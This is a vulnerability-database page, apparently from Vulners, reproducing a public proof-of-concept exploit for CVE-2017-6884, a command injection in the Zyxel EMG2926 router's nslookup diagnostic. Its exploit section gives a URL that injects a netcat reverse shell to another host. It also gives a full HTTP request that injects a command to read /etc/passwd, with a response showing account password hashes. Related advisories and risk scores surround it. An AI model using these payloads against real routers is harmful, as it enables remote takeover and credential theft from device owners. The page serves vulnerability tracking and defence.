Vulners
Lucene search
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability | 3 Apr 201700:00 | – | zdt |
 | CVE-2017-6884 | 6 Apr 201700:00 | – | attackerkb |
 | CVE-2017-6884 | 30 Jul 201808:48 | – | circl |
 | Zyxel EMG2926 Routers Command Injection Vulnerability | 18 Sep 202300:00 | – | cisa_kev |
 | CISA Adds Eight Known Exploited Vulnerabilities to Catalog | 18 Sep 202312:00 | – | cisa |
 | ZyXEL EMG2926 Router Remote Command Execution Vulnerability | 6 Apr 201700:00 | – | cnvd |
 | Zyxel EMG2926 Router OS Command Injection (CVE-2017-6884) | 16 Aug 201800:00 | – | checkpoint_advisories |
 | CVE-2017-6884 | 6 Apr 201717:00 | – | cve |
 | CVE-2017-6884 | 6 Apr 201717:00 | – | cvelist |
 | Zyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection | 2 Apr 201700:00 | – | exploitpack |
10
# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
# Date: 2017-04-02
# Exploit Author: Fluffy Huffy (trevor Hough)
# Vendor Homepage: www.zyxel.com
# Version: EMG2926 - V1.00(AAQT.4)b8
# Tested on: linux
# CVE : CVE-2017-6884
OS command injection vulnerability was discovered in a commonly used
home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools
specify the nslookup function. A malicious user may exploit numerous
vectors to execute arbitrary commands on the router.
Exploit (Reverse Shell)
https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&
ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p
Exploit (Dump Password File)
Request
GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1
Host: 192.168.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup
Accept-Language: en-US,en;q=0.8
Cookie: csd=9; sysauth=<Clipped>
Connection: close
Response (Clipped)
<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash
admin:$1$<Clipped>:0:0:admin:/:/bin/failData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2017 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.18.8
CVSS 29
EPSS0.90078
SSVC